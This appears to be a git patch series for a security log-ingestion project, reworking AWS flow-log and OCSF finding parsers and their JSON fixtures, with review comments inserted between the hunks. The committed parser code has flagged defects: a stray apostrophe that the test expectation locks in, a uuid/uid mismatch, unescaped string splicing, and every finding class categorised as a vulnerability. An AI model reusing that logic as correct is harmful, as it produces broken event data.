@@ -0,0 +1,73 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "AWS VPC Flow logs", + "dialect_uuid": "07c0cac8-f68f-11ea-adc1-0242ac120002" + } + }, + "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}" + }, + "expected": { + "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}", + "event": { + "category": [ + "network" + ], + "end": "2024-09-16T12:53:31Z", + "outcome": "ok", + "start": "2024-09-16T12:53:05Z" + }, + "@timestamp": "2024-09-16T12:53:05Z", + "action": { + "name": "accept", + "outcome": "ok", + "target": "network-traffic", + "type": "forward" + }, + "aws": { + "flowlogs": { + "subnet": { + "id": 
"subnet-0123456789abcdefg"
+ },
+ "vpc": {
+ "id": "vpc-0123456789abcdefg"
+ }
+ }
+ },
+ "cloud": {
+ "account": {
+ "id": "012345678901"
+ },
+ "provider": "aws"
+ },
+ "destination": {
+ "address": "5.6.7.8",
+ "ip": "5.6.7.8",
+ "port": 8080.0
+ },
+ "network": {
+ "iana_number": "6.0"
+ },
+ "observer": {
+ "ingress": {
+ "interface": {
+ "name": "eni-1235b8ca123456789"
+ }
+ }
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "bytes": 412.0,
+ "ip": "1.2.3.4",
+ "packets": 5.0,
+ "port": 25238.0
+ }
+ }
+}
\ No newline at end of file
From d67b031399f67b7cd50a78ab387addea667e5fdf Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Mon, 16 Sep 2024 17:04:32 +0200
Subject: [PATCH 031/317] fix on linting
---
AWS/aws-flow-logs/tests/network_traffic.json | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/AWS/aws-flow-logs/tests/network_traffic.json b/AWS/aws-flow-logs/tests/network_traffic.json
index 3c668b6a6..b946752ed 100644
--- a/AWS/aws-flow-logs/tests/network_traffic.json
+++ b/AWS/aws-flow-logs/tests/network_traffic.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}", "sekoiaio": { "intake": { "dialect": "AWS VPC Flow logs", "dialect_uuid": "07c0cac8-f68f-11ea-adc1-0242ac120002" } - }, - "message": "{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}" + } }, "expected": { "message": 
"{\"version\":5,\"account_id\":\"012345678901\",\"interface_id\":\"eni-1235b8ca123456789\",\"srcaddr\":\"1.2.3.4\",\"dstaddr\":\"5.6.7.8\",\"srcport\":25238.0,\"dstport\":8080.0,\"protocol\":6.0,\"packets\":5.0,\"bytes\":412.0,\"start\":1726491185,\"end\":1726491211,\"action\":\"ACCEPT\",\"log_status\":\"OK\",\"vpc_id\":\"vpc-0123456789abcdefg\",\"subnet_id\":\"subnet-0123456789abcdefg\",\"instance_id\":\"-\",\"tcp_flags\":3.0,\"type\":\"IPv4\",\"pkt_srcaddr\":\"1.2.3.4\",\"pkt_dstaddr\":\"5.6.7.8\",\"region\":\"eu-west-1\",\"az_id\":\"euw1-az3\",\"sublocation_type\":\"-\",\"sublocation_id\":\"-\",\"pkt_src_aws_service\":\"-\",\"pkt_dst_aws_service\":\"-\",\"flow_direction\":\"ingress\",\"traffic_path\":null}", From 141e6b8bbedea69c9068c33f127be0ae92d45361 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 16 Sep 2024 17:18:09 +0200 Subject: [PATCH 032/317] fix(OCSF): fix the way to extract vulnerabilities --- OCSF/ocsf/_meta/fields.yml | 5 +++ OCSF/ocsf/ingest/parser.yml | 36 ++++++++++++------- OCSF/ocsf/tests/test_detection_finding_2.json | 34 ++++++++++++++++++ .../tests/test_vulnerability_finding_1.json | 20 ++--------- 4 files changed, 65 insertions(+), 30 deletions(-) create mode 100644 OCSF/ocsf/tests/test_detection_finding_2.json diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml index 081424c29..1205bf0ae 100644 --- a/OCSF/ocsf/_meta/fields.yml +++ b/OCSF/ocsf/_meta/fields.yml @@ -20,6 +20,11 @@ ocsf.class_uid: name: ocsf.class_uid type: long +ocsf.vulnerabilities: + description: '' + name: ocsf.vulnerabilities + type: array + process.group.id: description: '' name: process.group.id diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index d63d70d8d..05a84c0b4 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml 
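Review bot: The new `ocsf.vulnerabilities` field is declared with `description: ''`, so the generated field documentation for this intake shows an empty entry for it; the neighbouring `process.group.id` has the same gap, but a field introduced by this commit should not add to it. Suggest `description: Vulnerabilities attached to the finding, one entry per item of the OCSF vulnerabilities array (id, version, description, score.base, severity, scanner.vendor)`. The `type: array` declaration says nothing about the element shape; if the fields format allows nested definitions, spelling them out here would make the consumer-facing schema explicit.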
@@ -879,19 +879,29 @@ stages:
 event.reason: "{{parse_event.message.finding.title}}"
 - set:
- vulnerability.id: >
- [{%- for item in parse_event.message.vulnerabilities -%}'{{item.cve.uid}}',{%- endfor -%}]
- vulnerability.score.version: >
- [{%- for item in parse_event.message.vulnerabilities -%}'{{item.cve.cvss.version}}',{%- endfor -%}]
- vulnerability.description: >
- [{%- for item in parse_event.message.vulnerabilities -%}'{{item.desc}}',{%- endfor -%}]
- vulnerability.score.base: >
- [{%- for item in parse_event.message.vulnerabilities -%}'{{item.cve.cvss.base_score | float}}',{%- endfor -%}]
- vulnerability.severity: >
- [{%- for item in parse_event.message.vulnerabilities -%}'{{item.severity}}',{%- endfor -%}]
- vulnerability.scanner.vendor: >
- [{%- for item in parse_event.message.vulnerabilities -%}'{{item.vendor_name}}',{%- endfor -%}]
- filter: "{{parse_event.message.vulnerabilities != null}}"
+ vulnerability.id: "{{parse_event.message.vulnerabilities[0].cve.uid}}"
+ vulnerability.score.version: "{{parse_event.message.vulnerabilities[0].cve.cvss.version}}"
+ vulnerability.description: "{{parse_event.message.vulnerabilities[0].desc}}"
+ vulnerability.score.base: "{{parse_event.message.vulnerabilities[0].cve.cvss.base_score | float}}"
+ vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}'"
+ vulnerability.scanner.vendor: "{{parse_event.message.vulnerabilities[0].vendor_name}}"
+ filter: "{{parse_event.message.get('vulnerabilities', []) | length > 0}}"
+
+ - set:
+ ocsf.vulnerabilities: >
+ [
+ {%- for item in parse_event.message.vulnerabilities -%}
+ {
+ 'id': '{{item.cve.uuid}}',
+ 'version': '{{item.cve.cvss.version}}',
+ 'description': '{{item.desc}}',
+ 'score': {'base': {{item.cve.cvss.base_score | float}} },
+ 'severity': '{{item.severity}}',
+ 'scanner': {'vendor': '{{item.vendor_name}}'},
+ },
+ {%- endfor -%}
+ ]
+ filter: "{{parse_event.message.get('vulnerabilities', []) | length > 1}}"
 pipeline_category_identity_and_access_management:
 actions:
diff --git a/OCSF/ocsf/tests/test_detection_finding_2.json b/OCSF/ocsf/tests/test_detection_finding_2.json
new file mode 100644
index 000000000..cecfab8d5
--- /dev/null
+++ b/OCSF/ocsf/tests/test_detection_finding_2.json
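Review bot: `vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}'"` has a stray apostrophe after the closing braces, so every event gets a severity ending in `'`, and the updated test_vulnerability_finding_1.json expectation (`"severity": "'"`) locks the bug in rather than catching it; the line should read `vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}"`. In the `ocsf.vulnerabilities` template, `'id': '{{item.cve.uuid}}'` disagrees with the `cve.uid` used six lines above for `vulnerability.id`; one of the two is a typo and, given the fixture's `CVE-2023-1255` output, presumably this one, so `'id': '{{item.cve.uid}}',`. The same template splices `item.desc` and the other vendor-supplied strings into single-quoted literals without escaping, so a description containing an apostrophe breaks the literal and the whole `ocsf.vulnerabilities` value is lost for that event; building the entries as dicts with `set`/`append` and rendering the list, instead of concatenating quoted text, avoids that. The `| length > 1` filter (rather than `> 0`) also deserves a comment if only multi-vulnerability findings are meant to receive the array.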
@@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"metadata\":{\"log_version\":\"2018-10-08\",\"product\":{\"feature\":{\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833\",\"name\":null},\"uid\":\"arn:aws:securityhub:eu-west-3::product/aws/guardduty\",\"name\":\"GuardDuty\",\"vendor_name\":\"Amazon\",\"version\":null},\"processed_time_dt\":1726062303537,\"profiles\":[\"cloud\",\"datetime\",\"linux\"],\"version\":\"1.1.0\",\"extensions\":[{\"name\":\"linux\",\"uid\":\"1\",\"version\":\"1.1.0\"}]},\"time\":1726062281022,\"time_dt\":1726062281022,\"confidence_score\":null,\"message\":null,\"cloud\":{\"account\":{\"uid\":\"11111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"resource\":null,\"finding_info\":{\"created_time_dt\":1681218428211,\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833/finding/9711517f14c54eb79ad3e3b0cee89e3c\",\"desc\":\"The API DescribeStackEvents was invoked using root credentials from IP address 62.129.18.152.\",\"title\":\"The API DescribeStackEvents was invoked using root 
credentials.\",\"modified_time_dt\":1726062281022,\"first_seen_time_dt\":1681218080000,\"last_seen_time_dt\":1726061921000,\"related_events\":null,\"types\":[\"TTPs/Policy:IAMUser-RootCredentialUsage\"],\"src_url\":\"https://eu-west-3.console.aws.amazon.com/guardduty/home?region=eu-west-3#/findings?macros=current&fId=9711517f14c54eb79ad3e3b0cee89e3c\"},\"remediation\":null,\"compliance\":null,\"vulnerabilities\":null,\"resources\":[{\"type\":\"AwsIamAccessKey\",\"uid\":\"AWS::IAM::AccessKey:********************\",\"cloud_partition\":\"aws\",\"region\":\"eu-west-3\",\"labels\":null,\"data\":\"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"11111111111\\\",\\\"PrincipalName\\\":\\\"Root\\\",\\\"PrincipalType\\\":\\\"Root\\\"}}\",\"criticality\":null,\"owner\":null}],\"evidences\":[{\"data\":\"\",\"actor\":null,\"process\":null,\"api\":{\"operation\":\"DescribeStackEvents\",\"response\":null,\"service\":{\"name\":\"cloudformation.amazonaws.com\"}},\"src_endpoint\":{\"ip\":\"1.2.3.4\",\"location\":{\"country\":\"France\",\"city\":\"Rennes\",\"coordinates\":[-1.6744,48.110001]},\"port\":null},\"connection_info\":null,\"dst_endpoint\":null,\"query\":null}],\"class_name\":\"Detection Finding\",\"class_uid\":2004,\"category_name\":\"Findings\",\"category_uid\":2,\"severity_id\":2,\"severity\":\"Low\",\"activity_name\":\"Update\",\"activity_id\":2,\"type_uid\":200402,\"type_name\":\"Detection Finding: Update\",\"status\":\"New\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"resources[].uid\",\"value\":\"AWS::IAM::AccessKey:********************\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"evidences[].src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n", + "sekoiaio": { + "intake": { + "dialect": "OCSF", + "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5" + } + } + }, + "expected": { + "message": 
"{\"metadata\":{\"log_version\":\"2018-10-08\",\"product\":{\"feature\":{\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833\",\"name\":null},\"uid\":\"arn:aws:securityhub:eu-west-3::product/aws/guardduty\",\"name\":\"GuardDuty\",\"vendor_name\":\"Amazon\",\"version\":null},\"processed_time_dt\":1726062303537,\"profiles\":[\"cloud\",\"datetime\",\"linux\"],\"version\":\"1.1.0\",\"extensions\":[{\"name\":\"linux\",\"uid\":\"1\",\"version\":\"1.1.0\"}]},\"time\":1726062281022,\"time_dt\":1726062281022,\"confidence_score\":null,\"message\":null,\"cloud\":{\"account\":{\"uid\":\"11111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"resource\":null,\"finding_info\":{\"created_time_dt\":1681218428211,\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833/finding/9711517f14c54eb79ad3e3b0cee89e3c\",\"desc\":\"The API DescribeStackEvents was invoked using root credentials from IP address 62.129.18.152.\",\"title\":\"The API DescribeStackEvents was invoked using root 
credentials.\",\"modified_time_dt\":1726062281022,\"first_seen_time_dt\":1681218080000,\"last_seen_time_dt\":1726061921000,\"related_events\":null,\"types\":[\"TTPs/Policy:IAMUser-RootCredentialUsage\"],\"src_url\":\"https://eu-west-3.console.aws.amazon.com/guardduty/home?region=eu-west-3#/findings?macros=current&fId=9711517f14c54eb79ad3e3b0cee89e3c\"},\"remediation\":null,\"compliance\":null,\"vulnerabilities\":null,\"resources\":[{\"type\":\"AwsIamAccessKey\",\"uid\":\"AWS::IAM::AccessKey:********************\",\"cloud_partition\":\"aws\",\"region\":\"eu-west-3\",\"labels\":null,\"data\":\"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"11111111111\\\",\\\"PrincipalName\\\":\\\"Root\\\",\\\"PrincipalType\\\":\\\"Root\\\"}}\",\"criticality\":null,\"owner\":null}],\"evidences\":[{\"data\":\"\",\"actor\":null,\"process\":null,\"api\":{\"operation\":\"DescribeStackEvents\",\"response\":null,\"service\":{\"name\":\"cloudformation.amazonaws.com\"}},\"src_endpoint\":{\"ip\":\"1.2.3.4\",\"location\":{\"country\":\"France\",\"city\":\"Rennes\",\"coordinates\":[-1.6744,48.110001]},\"port\":null},\"connection_info\":null,\"dst_endpoint\":null,\"query\":null}],\"class_name\":\"Detection Finding\",\"class_uid\":2004,\"category_name\":\"Findings\",\"category_uid\":2,\"severity_id\":2,\"severity\":\"Low\",\"activity_name\":\"Update\",\"activity_id\":2,\"type_uid\":200402,\"type_name\":\"Detection Finding: Update\",\"status\":\"New\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"resources[].uid\",\"value\":\"AWS::IAM::AccessKey:********************\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"evidences[].src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n", + "event": { + "action": "update", + "category": [], + "severity": 2, + "type": [] + }, + "@timestamp": "2024-09-11T13:44:41.022000Z", + "cloud": { + "account": { + "id": "11111111111" + }, + "provider": "AWS", + "region": "eu-west-3" + }, + 
"ocsf": {
+ "activity_id": 2,
+ "activity_name": "Update",
+ "class_name": "Detection Finding",
+ "class_uid": 2004
+ }
+ }
+}
\ No newline at end of file
diff --git a/OCSF/ocsf/tests/test_vulnerability_finding_1.json b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
index 89ec9b0a7..ddc18e5c4 100644
--- a/OCSF/ocsf/tests/test_vulnerability_finding_1.json
+++ b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
@@ -25,25 +25,11 @@
 "class_uid": 2002
 },
 "vulnerability": {
- "description": [
- ""
- ],
- "id": [
- "CVE-2023-1255"
- ],
+ "id": "CVE-2023-1255",
 "scanner": {
- "vendor": [
- "NVD"
- ]
+ "vendor": "NVD"
 },
- "score": {
- "version": [
- ""
- ]
- },
- "severity": [
- ""
- ]
+ "severity": "'"
 }
 }
 }
\ No newline at end of file
From 1bf39df5324008451a5b6bc69e70d19a4aa00d7c Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 16 Sep 2024 17:23:59 +0200
Subject: [PATCH 033/317] fix(OCSF): add event.category and event.type for findings
---
OCSF/ocsf/ingest/parser.yml | 3 ++-
OCSF/ocsf/tests/test_compliance_finding_1.json | 8 ++++++--
OCSF/ocsf/tests/test_detection_finding_1.json | 8 ++++++--
OCSF/ocsf/tests/test_detection_finding_2.json | 8 ++++++--
OCSF/ocsf/tests/test_vulnerability_finding_1.json | 8 ++++++--
5 files changed, 26 insertions(+), 9 deletions(-)
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 05a84c0b4..6a711a8ba 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
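Review bot: The new test_detection_finding_2.json fixture keeps a routable public address (`62.129.18.152`) inside `finding_info.desc` while `src_endpoint.ip` in the same record was already replaced with `1.2.3.4`; fixtures committed to the repository should be sanitised consistently, so the description text should use the same placeholder. Its expected block also asserts `"category": []` and `"type": []`, which the following commit in this series (PATCH 033) rewrites for this very file; harmless as a series, but worth squashing if the branch is reworked.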
@@ -166,6 +166,7 @@ stages:
 [
 {%- if parse_event.message.class_uid == 2001 and parse_event.message.malware != null -%}'malware',{%- endif -%}
 {%- if parse_event.message.class_uid == 2001 and parse_event.message.vulnerabilities != null -%}'vulnerability',{%- endif -%}
+ {%- if parse_event.message.class_uid in [2002, 2003, 2004, 2005, 2006] -%}'vulnerability',{%- endif -%}
 {%- if parse_event.message.class_uid in [3001, 3005, 3006] -%}'iam',{%- endif -%}
 {%- if parse_event.message.class_uid == 3002 -%}'authentication',{%- endif -%}
 {%- if parse_event.message.class_uid == 3003 -%}'session',{%- endif -%}
@@ -185,7 +186,7 @@ stages:
 - set:
 event.type: >
 [
- {%- if parse_event.message.class_uid in [1001,1002,1003,1007,2001,3001,3002,3003,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,5001,5002,6002,6003,6004] -%}'info',{%- endif -%}
+ {%- if parse_event.message.class_uid in [1001,1002,1003,1007,2001,2002,2003,2004,2005,2006,3001,3002,3003,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,5001,5002,6002,6003,6004] -%}'info',{%- endif -%}
 {%- if parse_event.message.class_uid in [3001, 3006] -%}'user',{%- endif -%}
 {%- if parse_event.message.class_uid in [3005] -%}'group',{%- endif -%}
 {%- if parse_event.message.class_uid in [4003,4004,4005,4007,4008] -%}'protocol',{%- endif -%}
diff --git a/OCSF/ocsf/tests/test_compliance_finding_1.json b/OCSF/ocsf/tests/test_compliance_finding_1.json
index 5b2f713c5..f897afe21 100644
--- a/OCSF/ocsf/tests/test_compliance_finding_1.json
+++ b/OCSF/ocsf/tests/test_compliance_finding_1.json
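Review bot: The added line assigns `event.category` `vulnerability` to every finding class 2002–2006, but the fixtures in this commit show 2003 as `Compliance Finding` and 2004 as `Detection Finding` (a GuardDuty root-credential-usage alert), which are not vulnerabilities; ECS has `configuration` and `intrusion_detection` for those, and a detection filed under `vulnerability` is missed by rules and dashboards keyed on category. Suggest splitting it: `{%- if parse_event.message.class_uid == 2002 -%}'vulnerability',{%- endif -%}`, `{%- if parse_event.message.class_uid == 2003 -%}'configuration',{%- endif -%}`, `{%- if parse_event.message.class_uid == 2004 -%}'intrusion_detection',{%- endif -%}`, with 2005/2006 left to a deliberate choice rather than the blanket rule. The `event.category: >` key that this list belongs to sits above the hunk; the `event.type` hunk below applies the same blanket `info`, which is acceptable there, and the fixture expectations (test_compliance_finding_1.json and the detection fixtures) would change with the category split.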
@@ -6,9 +6,13 @@ "message": "{\"activity_id\": 2, \"activity_name\": \"Update\", \"category_name\": \"Findings\", \"category_uid\": 2, \"class_name\": \"Compliance Finding\", \"class_uid\": 2003, \"cloud\": {\"account\": {\"uid\": \"111111111111\"}, \"provider\": \"AWS\", \"region\": \"us-east-2\"}, \"compliance\": {\"control\": \"Config.1\", \"requirements\": [\"PCI DSS 10.5.2\", \"PCI DSS 11.5\"], \"standards\": [\"standards/pci-dss/v/3.2.1\"], \"status\": \"FAILED\"}, \"finding_info\": {\"created_time_dt\": \"2023-01-13T15:08:44.967-05:00\", \"desc\": \"This AWS control checks whether AWS Config is enabled in current account and region.\", \"first_seen_time_dt\": \"2023-01-13T15:08:44.967-05:00\", \"last_seen_time_dt\": \"2023-07-21T14:12:05.693-04:00\", \"modified_time_dt\": \"2023-07-21T14:11:53.060-04:00\", \"title\": \"PCI.Config.1 AWS Config should be enabled\", \"types\": [\"Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS\"], \"uid\": \"arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6\"}, \"metadata\": {\"log_version\": \"2018-10-08\", \"processed_time_dt\": \"2023-07-21T14:12:08.489-04:00\", \"product\": {\"feature\": {\"uid\": \"pci-dss/v/3.2.1/PCI.Config.1\"}, \"name\": \"Security Hub\", \"uid\": \"arn:aws:securityhub:us-east-2::product/aws/securityhub\", \"vendor_name\": \"AWS\"}, \"profiles\": [\"cloud\", \"datetime\"], \"version\": \"1.1.0\"}, \"observables\": [{\"name\": \"resource.uid\", \"type\": \"Resource UID\", \"type_id\": 10, \"value\": \"AWS::::Account:111111111111\"}], \"remediation\": {\"desc\": \"For information on how to correct this issue, consult the AWS Security Hub controls documentation.\", \"references\": [\"https://docs.aws.amazon.com/console/securityhub/Config.1/remediation\"]}, \"resource\": {\"cloud_partition\": \"aws\", \"region\": \"us-east-2\", \"type\": \"AwsAccount\", \"uid\": \"AWS::::Account:111111111111\"}, 
\"severity\": \"Medium\", \"severity_id\": 3, \"status\": \"New\", \"time\": 1689963113060, \"time_dt\": \"2023-07-21T14:11:53.060-04:00\", \"type_name\": \"Compliance Finding: Update\", \"type_uid\": 200302, \"unmapped\": {\"FindingProviderFields.Severity.Label\": \"MEDIUM\", \"FindingProviderFields.Severity.Original\": \"MEDIUM\", \"FindingProviderFields.Types[]\": \"Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS\", \"ProductFields.ControlId\": \"PCI.Config.1\", \"ProductFields.RecommendationUrl\": \"https://docs.aws.amazon.com/console/securityhub/Config.1/remediation\", \"ProductFields.Resources:0/Id\": \"arn:aws:iam::111111111111:root\", \"ProductFields.StandardsArn\": \"arn:aws:securityhub:::standards/pci-dss/v/3.2.1\", \"ProductFields.StandardsControlArn\": \"arn:aws:securityhub:us-east-2:111111111111:control/pci-dss/v/3.2.1/PCI.Config.1\", \"ProductFields.StandardsSubscriptionArn\": \"arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1\", \"ProductFields.aws/securityhub/CompanyName\": \"AWS\", \"ProductFields.aws/securityhub/FindingId\": \"arn:aws:securityhub:us-east-2::product/aws/securityhub/arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6\", \"ProductFields.aws/securityhub/ProductName\": \"Security Hub\", \"RecordState\": \"ACTIVE\", \"Severity.Normalized\": \"40\", \"Severity.Original\": \"MEDIUM\", \"Severity.Product\": \"40\", \"WorkflowState\": \"NEW\"}}", "event": { "action": "update", - "category": [], + "category": [ + "vulnerability" + ], "severity": 3, - "type": [] + "type": [ + "info" + ] }, "@timestamp": "2023-07-21T18:11:53.060000Z", "cloud": { diff --git a/OCSF/ocsf/tests/test_detection_finding_1.json b/OCSF/ocsf/tests/test_detection_finding_1.json index 15c53b791..4099501c1 100644 --- a/OCSF/ocsf/tests/test_detection_finding_1.json +++ b/OCSF/ocsf/tests/test_detection_finding_1.json 
@@ -6,9 +6,13 @@ "message": "{\"activity_id\": 1, \"activity_name\": \"Create\", \"category_name\": \"Findings\", \"category_uid\": 2, \"class_name\": \"Detection Finding\", \"class_uid\": 2004, \"cloud\": {\"account\": {\"uid\": \"111111111111\"}, \"provider\": \"AWS\", \"region\": \"us-east-2\"}, \"evidences\": [{\"api\": {\"operation\": \"DeleteTrail\", \"service\": {\"name\": \"cloudtrail.amazonaws.com\"}}, \"data\": \"\", \"src_endpoint\": {\"ip\": \"52.94.133.131\", \"location\": {\"city\": \"\", \"coordinates\": [-100.821999, 37.751], \"country\": \"United States\"}}}], \"finding_info\": {\"created_time_dt\": \"2023-09-19T11:05:22.487-04:00\", \"desc\": \"AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled by Admin calling DeleteTrail under unusual circumstances. This can be attackers attempt to cover their tracks by eliminating any trace of activity performed while they accessed your account.\", \"first_seen_time_dt\": \"2023-09-19T10:55:09.000-04:00\", \"last_seen_time_dt\": \"2023-09-19T10:55:09.000-04:00\", \"modified_time_dt\": \"2023-09-19T11:05:22.487-04:00\", \"src_url\": \"https://us-east-2.console.aws.amazon.com/guardduty/home?region=us-east-2#/findings?macros=current&fId=a6c556fcbc9bea427a19f8b787099a0b\", \"title\": \"AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled.\", \"types\": [\"TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled\"], \"uid\": \"arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b\"}, \"metadata\": {\"extensions\": [{\"name\": \"linux\", \"uid\": \"1\", \"version\": \"1.1.0\"}], \"log_version\": \"2018-10-08\", \"product\": {\"feature\": {\"uid\": \"arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE\"}, \"name\": \"GuardDuty\", \"uid\": \"arn:aws:securityhub:us-east-2::product/aws/guardduty\", \"vendor_name\": \"Amazon\"}, 
